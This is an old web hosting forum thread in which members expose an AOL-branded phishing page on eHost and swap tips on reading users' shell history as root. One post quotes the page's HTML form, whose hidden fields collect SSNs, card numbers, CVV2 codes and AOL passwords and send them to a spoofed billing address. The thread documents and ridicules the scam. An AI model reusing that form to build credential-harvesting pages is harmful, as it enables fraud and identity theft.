Sadly there are tons of those, and people are fooled. I have seen it for hallmark also. UNIXIELHOST 12-31-2001, 09:47 PM Holy Smokey, when I see the site, what I see here: <form name="dialog" action="http://liscripts.virtualave.net/cgi-bin/formmail/formmaillite.cgi" method="post"> <input type="hidden" name="fields" value="Name,SSN,Street,Street2,Country,State,City,Zip,phone,phone2,CardType,CardNumber,Cvv2,ExpMon,ExpYear,CardBank,NonType,NonNumber,NonCvv2,NonExpMon,NonEx pYear,NonName,NonBank,screen_name,password"> <input type="hidden" name="mail" value="billing@aol-instantbilling.com"> <input type="hidden" name="refr_adr" value="http://www.aol.com/info/pricing.html"> Hot damn! They have a very technical layout for it: 1. Send out a message making people think you're actually going to do something about it (which usually says it's been forwarded to the so and so department to be analyzed or some other BS). 2. Send the mail to an infinite loop cycle which never does anything OR delete it. Yep  :D  MCHost-Marc 12-31-2001, 10:55 PM This guy opened an account with us and tried to send out spam emails. Seems to be a 'spam-specialist' that uses other people's credit cards to purchase products online. For something unique ...here are some pictures of him: http://home.dal.net/nude-helper/ (there is no nudity). If you can't find the URL, let me know ...i got them all saved ;) Good old .bash_history :D sbrad 12-31-2001, 11:17 PM Good old .bash_history hehe. I've cancelled more than one account after a peek into the .bash_history. :D Frosty 01-01-2002, 12:04 AM eerrrr....real dumb question...how does one look into the ".bash_history" history of a site? :o MCHost-Marc 01-01-2002, 12:30 AM If you have root access to a server, you basically go into /home/username (replace 'username' with the account's username and then execute this command: 'pico .bash_history' That should show you the list of shell commands that the user has executed. Frosty 01-01-2002, 12:35 AM Gotcha, i see the light now....thanks. :D Coran 01-01-2002, 01:29 AM Truly Scary Stuff. Happy New Year All  appletreats 01-01-2002, 01:32 AM I'm sure AOL will take action immediately.      Poor people. If you want to get something done, email the host. It seems to be eHost. Coran 01-01-2002, 01:57 AM I am sure AOL will jump right on it... :homer: ebird 01-01-2002, 02:53 AM Even if people don't know how to check the file source, what about the url on the address bar: https://eweb13.ehost.com/~aol-inst/index.html They believe this is from AOL? cperciva 01-01-2002, 03:02 AM Originally posted by Kiwi 'pico .bash_history' Of course, that only works if they're using bash. If they might be using other shells, try 'more ~username/.*hist*' ... and if you have process accounting running then 'sa -iu | grep `id -u username`' is always good. HostInspect 01-01-2002, 05:35 AM On the pics, what is he trying to show us? The stuff he stole from using other people's credit cards? Or what he just got from christmas? I would like to see a picture of him in jail :) MCHost-Marc 01-01-2002, 04:30 PM Originally posted by HostInspect On the pics, what is he trying to show us? Just FYI, he's located in Macedonia. appletreats 01-02-2002, 10:02 PM Not Found The requested URL /~aol-inst/index.html was not found on this server. -------------------------------------------------------------------------------- Apache/1.3.12 Server at eWeb12.eHost.com Port 443 I wonder... did the scammers take it down? Or did the host? UNIXIELHOST 01-02-2002, 10:24 PM That becuase I emailed to AOL Spam Department and they confirmed it was taken down :D appletreats 01-02-2002, 10:32 PM Originally posted by josephp That becuase I emailed to AOL Spam Department and they confirmed it was taken down :D  AOL did something about it? That was unexpected. Frosty 01-03-2002, 01:31 AM What happens to the litttle psycho when they catch him. Are they able to track him down and get`em? TimM 01-03-2002, 05:25 PM You all hate AOL?!? GO AOLERS!!! It's actually not THAT bad... appletreats 01-03-2002, 06:00 PM It's kinda slow...
